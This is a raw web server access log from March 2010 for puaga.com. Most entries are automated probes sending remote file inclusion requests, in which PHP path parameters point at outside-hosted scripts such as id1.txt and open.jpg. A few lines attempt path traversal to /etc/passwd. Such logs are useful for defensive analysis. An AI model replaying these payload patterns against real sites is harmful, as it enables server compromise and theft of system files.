118.217.5.166 - - [03/Mar/2010:10:05:09 -0800] "GET /error.php?dir=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.5.166 - - [03/Mar/2010:10:05:09 -0800] "GET /logs/access_100205.log%20%20//error.php?dir=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.5.166 - - [03/Mar/2010:10:05:09 -0800] "GET /logs//error.php?dir=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
151.8.79.19 - - [03/Mar/2010:10:05:54 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://web.hufs.ac.kr/~seok/zb41/data/ypjp0/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
151.8.79.19 - - [03/Mar/2010:10:05:54 -0800] "GET /logs/access_100206.log//admin/spaw/spaw_control.class.php?spaw_root=http://web.hufs.ac.kr/~seok/zb41/data/ypjp0/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
151.8.79.19 - - [03/Mar/2010:10:05:57 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://web.hufs.ac.kr/~seok/zb41/data/ypjp0/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [03/Mar/2010:10:06:11 -0800] "GET /logs/access_100128.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
118.217.5.166 - - [03/Mar/2010:10:06:32 -0800] "GET /logs/access_100209.log%20%20//ask_password.php?dir=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.5.166 - - [03/Mar/2010:10:06:32 -0800] "GET /logs//ask_password.php?dir=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.5.166 - - [03/Mar/2010:10:06:32 -0800] "GET /ask_password.php?dir=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [03/Mar/2010:10:07:05 -0800] "GET /error.php?dir=http://www.smrkbor.cz/cz/katalog/byz9991.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:10:07:09 -0800] "GET /errors.php?error=http://www.ltwoong.pe.kr:8080////tmp/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:10:07:09 -0800] "GET /logs/access_100201.log%20%20/errors.php?error=http://www.ltwoong.pe.kr:8080////tmp/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:10:07:09 -0800] "GET /logs/errors.php?error=http://www.ltwoong.pe.kr:8080////tmp/id1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [03/Mar/2010:10:07:10 -0800] "GET /logs/access_100214.log%20%20//error.php?dir=http://www.smrkbor.cz/cz/katalog/byz9991.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [03/Mar/2010:10:07:10 -0800] "GET /logs//error.php?dir=http://www.smrkbor.cz/cz/katalog/byz9991.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [03/Mar/2010:10:07:38 -0800] "GET /logs/access_100129.log//newspublish/include.php?path%5Bdocroot%5D=http://www.villantomagazin.com//1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.5.166 - - [03/Mar/2010:10:07:39 -0800] "GET /logs/access_100218.log%20%20//ask_password.php?dir=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.255.116.109 - - [03/Mar/2010:10:07:40 -0800] "GET /logs/access_100206.log%20%20//admin.a6mambocredits.php?mosConfig_live_site=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [03/Mar/2010:10:07:59 -0800] "GET /logs/access_100205.log%20%20//error.php?dir=http://www.smrkbor.cz/cz/katalog/byz9991.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:10:08:11 -0800] "GET /logs/access_100128.log%20%20/errors.php?error=http://www.ltwoong.pe.kr:8080////tmp/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.112 - - [03/Mar/2010:10:08:45 -0800] "GET /errors.php?error=http://www.difusion.com.mx/components/com_web/administrator/components/com_modules/models/ico.jpg/5.9v1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.112 - - [03/Mar/2010:10:08:45 -0800] "GET /logs//errors.php?error=http://www.difusion.com.mx/components/com_web/administrator/components/com_modules/models/ico.jpg/5.9v1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.112 - - [03/Mar/2010:10:08:46 -0800] "GET /logs/access_100126.log%20%20//errors.php?error=http://www.difusion.com.mx/components/com_web/administrator/components/com_modules/models/ico.jpg/5.9v1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.112 - - [03/Mar/2010:10:08:56 -0800] "GET /logs//errors.php?error=http://www.difusion.com.mx/components/com_web/administrator/components/com_modules/models/ico.jpg/5.9v1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [03/Mar/2010:10:09:07 -0800] "GET /logs/access_100129.log%20%20//newspublish/include.php?path%5Bdocroot%5D=http://www.villantomagazin.com//1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [03/Mar/2010:10:09:45 -0800] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.ltwoong.pe.kr:8080////tmp/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [03/Mar/2010:10:09:45 -0800] "GET /logs/access_100209.log%20%20//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.ltwoong.pe.kr:8080////tmp/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [03/Mar/2010:10:09:46 -0800] "GET /index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.ltwoong.pe.kr:8080////tmp/id2.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [03/Mar/2010:10:09:51 -0800] "GET /logs/access_100209.log%20%20//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.ltwoong.pe.kr:8080////tmp/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [03/Mar/2010:10:09:51 -0800] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.ltwoong.pe.kr:8080////tmp/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [03/Mar/2010:10:09:52 -0800] "GET /index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.ltwoong.pe.kr:8080////tmp/id2.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:10:10:34 -0800] "GET /logs//appserv/main.php?appserv_root=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:10:10:34 -0800] "GET /appserv/main.php?appserv_root=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:10:10:34 -0800] "GET /logs/access_100126.log//appserv/main.php?appserv_root=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [03/Mar/2010:10:10:52 -0800] "GET /logs/access_100205.log//bbs///////good.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.39.222 - - [03/Mar/2010:10:10:58 -0800] "GET /logs/access_100128.log//components/com_freechat/chatwindow.php?uebergabe=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.39.222 - - [03/Mar/2010:10:10:58 -0800] "GET /components/com_freechat/chatwindow.php?uebergabe=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.39.222 - - [03/Mar/2010:10:10:58 -0800] "GET /logs//components/com_freechat/chatwindow.php?uebergabe=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [03/Mar/2010:10:11:06 -0800] "GET /logs/access_100207.log//bbs///////good.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [03/Mar/2010:10:11:18 -0800] "GET /logs/access_100129.log//newspublish/include.php?path%5Bdocroot%5D=http://www.villantomagazin.com//1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.37.143.198 - - [03/Mar/2010:10:11:18 -0800] "GET //vwar/backup/errors.php?error=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.37.143.198 - - [03/Mar/2010:10:11:18 -0800] "GET /logs/access_100221.log///vwar/backup/errors.php?error=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.37.143.198 - - [03/Mar/2010:10:11:18 -0800] "GET /logs///vwar/backup/errors.php?error=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
128.241.54.188 - - [03/Mar/2010:10:11:19 -0800] "GET /logs/access_100210.log//admin.a6mambocredits.php?mosConfig_live_site=http://car.sorabol.ac.kr///xe/files/.files/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.37.143.198 - - [03/Mar/2010:10:11:23 -0800] "GET /logs/access.log///vwar/backup/errors.php?error=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [03/Mar/2010:10:11:23 -0800] "GET /logs/access_100202.log%20%20///light//include/mail.inc.php?skin_board_path=http://www.hsus-math.com.tw//appserv/jan??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.39.222 - - [03/Mar/2010:10:11:29 -0800] "GET /logs//components/com_freechat/chatwindow.php?uebergabe=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.39.222 - - [03/Mar/2010:10:11:29 -0800] "GET /logs/access_100128.log%20%20//components/com_freechat/chatwindow.php?uebergabe=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.39.222 - - [03/Mar/2010:10:11:29 -0800] "GET /components/com_freechat/chatwindow.php?uebergabe=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [03/Mar/2010:10:11:53 -0800] "GET /logs/access_100217.log%20%20//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.ltwoong.pe.kr:8080////tmp/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [03/Mar/2010:10:11:54 -0800] "GET /logs/access_100217.log%20%20//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.ltwoong.pe.kr:8080////tmp/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.112.232 - - [03/Mar/2010:10:12:08 -0800] "GET /logs/access_100216.log HTTP/1.0" 200 1447964 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
222.239.227.209 - - [03/Mar/2010:10:12:21 -0800] "GET /logs/access_100202.log%20%20///light//include/mail.inc.php?skin_board_path=http://www.hsus-math.com.tw//appserv/jan??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:10:13:58 -0800] "GET /index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.ltwoong.pe.kr:8080////tmp/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:10:14:23 -0800] "GET /logs/access_100209.log%20%20//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.ltwoong.pe.kr:8080////tmp/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:10:14:23 -0800] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.ltwoong.pe.kr:8080////tmp/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:10:14:23 -0800] "GET /index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.ltwoong.pe.kr:8080////tmp/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [03/Mar/2010:10:14:39 -0800] "GET /forum/?sourcedir=http://chefartsmith.net/cms/tmp/color.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [03/Mar/2010:10:14:39 -0800] "GET /logs/forum/?sourcedir=http://chefartsmith.net/cms/tmp/color.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [03/Mar/2010:10:14:39 -0800] "GET /logs/access_100129.log%20%20/forum/?sourcedir=http://chefartsmith.net/cms/tmp/color.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [03/Mar/2010:10:15:22 -0800] "GET /bbs/write_update.php?board_skin_path=http://www.sosos.co.kr/id.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
78.188.102.171 - - [03/Mar/2010:10:15:55 -0800] "GET / HTTP/1.1" 200 401 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.8) Gecko/20100205 SeaMonkey/2.0.3" "pixero.net"
78.188.102.171 - - [03/Mar/2010:10:15:56 -0800] "GET /pnetsite/fav.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.8) Gecko/20100205 SeaMonkey/2.0.3" "pixero.net"
200.93.147.154 - - [03/Mar/2010:10:16:03 -0800] "GET /logs/access_100217.log%20%20//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.ltwoong.pe.kr:8080////tmp/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [03/Mar/2010:10:18:00 -0800] "GET /logs/access_100206.log//bbs/write_update.php?board_skin_path=http://www.sosos.co.kr/id.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
64.15.158.246 - - [03/Mar/2010:10:18:00 -0800] "GET /bbs/write_update.php?board_skin_path=http://www.sosos.co.kr/id.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
64.15.158.246 - - [03/Mar/2010:10:18:00 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://www.sosos.co.kr/id.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
67.195.112.232 - - [03/Mar/2010:10:18:23 -0800] "GET /logs/?N=D HTTP/1.0" 200 4926 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
64.15.158.246 - - [03/Mar/2010:10:18:30 -0800] "GET /logs/access_100126.log//bbs/write_update.php?board_skin_path=http://www.sosos.co.kr/id.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
78.110.50.112 - - [03/Mar/2010:10:19:25 -0800] "GET /logs/access_100225.log//errors.php?error=http://www.difusion.com.mx/components/com_web/administrator/components/com_modules/models/ico.jpg/5.9v1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.47.7.71 - - [03/Mar/2010:10:19:28 -0800] "GET /ggambo5100_gallery//setup.php?dir=http://www.kamawilson.com/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.47.7.71 - - [03/Mar/2010:10:19:28 -0800] "GET /logs/access_100209.log%20%20//ggambo5100_gallery//setup.php?dir=http://www.kamawilson.com/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.47.7.71 - - [03/Mar/2010:10:19:28 -0800] "GET /logs//ggambo5100_gallery//setup.php?dir=http://www.kamawilson.com/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.47.7.71 - - [03/Mar/2010:10:20:24 -0800] "GET /logs/access_100203.log%20%20//ggambo5100_gallery//setup.php?dir=http://www.kamawilson.com/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [03/Mar/2010:10:21:39 -0800] "GET /logs/access_100129.log/forum/?sourcedir=http://chefartsmith.net/cms/tmp/color.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [03/Mar/2010:10:23:55 -0800] "GET /logs/access_100201.log/forum/?sourcedir=http://chefartsmith.net/cms/tmp/color.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.47.7.71 - - [03/Mar/2010:10:25:13 -0800] "GET /logs/access_100210.log//ggambo5100_gallery//setup.php?dir=http://www.kamawilson.com/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
151.8.79.19 - - [03/Mar/2010:10:25:16 -0800] "GET /newspublish/include.php?path%5Bdocroot%5D=http://web.hufs.ac.kr/~seok/zb41/data/ypjp0/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
151.8.79.19 - - [03/Mar/2010:10:25:19 -0800] "GET /logs/access_100224.log//newspublish/include.php?path%5Bdocroot%5D=http://web.hufs.ac.kr/~seok/zb41/data/ypjp0/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
151.8.79.19 - - [03/Mar/2010:10:25:19 -0800] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://web.hufs.ac.kr/~seok/zb41/data/ypjp0/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.47.7.71 - - [03/Mar/2010:10:25:20 -0800] "GET /logs/access_100207.log//ggambo5100_gallery//setup.php?dir=http://www.kamawilson.com/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.217.198.155 - - [03/Mar/2010:10:25:32 -0800] "GET /logs/access_100128.log%20%20//board/bbs/delete_all.php?board_skin_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.217.198.155 - - [03/Mar/2010:10:25:32 -0800] "GET /logs//board/bbs/delete_all.php?board_skin_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.217.198.155 - - [03/Mar/2010:10:25:33 -0800] "GET /board/bbs/delete_all.php?board_skin_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
151.8.79.19 - - [03/Mar/2010:10:25:56 -0800] "GET /newspublish/include.php?path%5Bdocroot%5D=http://web.hufs.ac.kr/~seok/zb41/data/ypjp0/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
151.8.79.19 - - [03/Mar/2010:10:25:56 -0800] "GET /logs/access_100224.log//newspublish/include.php?path%5Bdocroot%5D=http://web.hufs.ac.kr/~seok/zb41/data/ypjp0/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
151.8.79.19 - - [03/Mar/2010:10:25:56 -0800] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://web.hufs.ac.kr/~seok/zb41/data/ypjp0/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.217.198.155 - - [03/Mar/2010:10:27:08 -0800] "GET /logs/access_100207.log%20%20//board/bbs/delete_all.php?board_skin_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.217.198.155 - - [03/Mar/2010:10:27:13 -0800] "GET /logs//board/bbs/delete_all.php?board_skin_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.217.198.155 - - [03/Mar/2010:10:27:13 -0800] "GET /board/bbs/delete_all.php?board_skin_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.217.198.155 - - [03/Mar/2010:10:27:13 -0800] "GET /logs/access_100128.log%20%20//board/bbs/delete_all.php?board_skin_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.217.198.155 - - [03/Mar/2010:10:28:40 -0800] "GET /logs/access_100207.log%20%20//board/bbs/delete_all.php?board_skin_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
93.90.115.49 - - [03/Mar/2010:10:29:34 -0800] "GET /logs//board/bbs/delete_all.php?board_skin_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
93.90.115.49 - - [03/Mar/2010:10:29:34 -0800] "GET /board/bbs/delete_all.php?board_skin_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
93.90.115.49 - - [03/Mar/2010:10:29:34 -0800] "GET /logs/access_100128.log%20%20//board/bbs/delete_all.php?board_skin_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
93.90.115.49 - - [03/Mar/2010:10:30:48 -0800] "GET /logs/access_100207.log%20%20//board/bbs/delete_all.php?board_skin_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [03/Mar/2010:10:31:25 -0800] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [03/Mar/2010:10:31:25 -0800] "GET /logs/access_100226.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [03/Mar/2010:10:31:25 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [03/Mar/2010:10:31:33 -0800] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [03/Mar/2010:10:31:34 -0800] "GET /logs/access_100226.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [03/Mar/2010:10:31:34 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
93.90.115.49 - - [03/Mar/2010:10:32:32 -0800] "GET /board/bbs/delete_all.php?board_skin_path=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
93.90.115.49 - - [03/Mar/2010:10:32:32 -0800] "GET /board/bbs/delete_all.php?board_skin_path=./../../../../../../../../etc/passwd HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
210.205.6.233 - - [03/Mar/2010:10:32:50 -0800] "GET /logs/access_100222.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [03/Mar/2010:10:32:56 -0800] "GET /logs/access_100222.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [03/Mar/2010:10:35:35 -0800] "GET /logs/access_100201.log//bbs///////good.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
93.90.115.49 - - [03/Mar/2010:10:35:35 -0800] "GET /board/bbs/delete_all.php?board_skin_path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
220.80.108.81 - - [03/Mar/2010:10:35:35 -0800] "GET /logs//bbs///////good.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [03/Mar/2010:10:35:35 -0800] "GET /bbs///////good.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.230.148.90 - - [03/Mar/2010:10:35:55 -0800] "GET /bbs/write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.230.148.90 - - [03/Mar/2010:10:35:56 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.230.148.90 - - [03/Mar/2010:10:35:56 -0800] "GET /logs/access_100211.log%20%20//bbs/write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.230.148.90 - - [03/Mar/2010:10:36:00 -0800] "GET /logs/access_100223.log%20%20//bbs/write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [03/Mar/2010:10:36:07 -0800] "GET /logs/access_100206.log%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [03/Mar/2010:10:36:07 -0800] "GET /logs/access_100213.log%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
93.124.33.79 - - [03/Mar/2010:10:37:34 -0800] "GET / HTTP/1.0" 200 3626 "http://puaga.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "puaga.com"
93.124.33.79 - - [03/Mar/2010:10:37:35 -0800] "GET / HTTP/1.0" 200 3626 "http://puaga.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "puaga.com"
200.93.147.154 - - [03/Mar/2010:10:38:40 -0800] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://www.ltwoong.pe.kr:8080////tmp/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
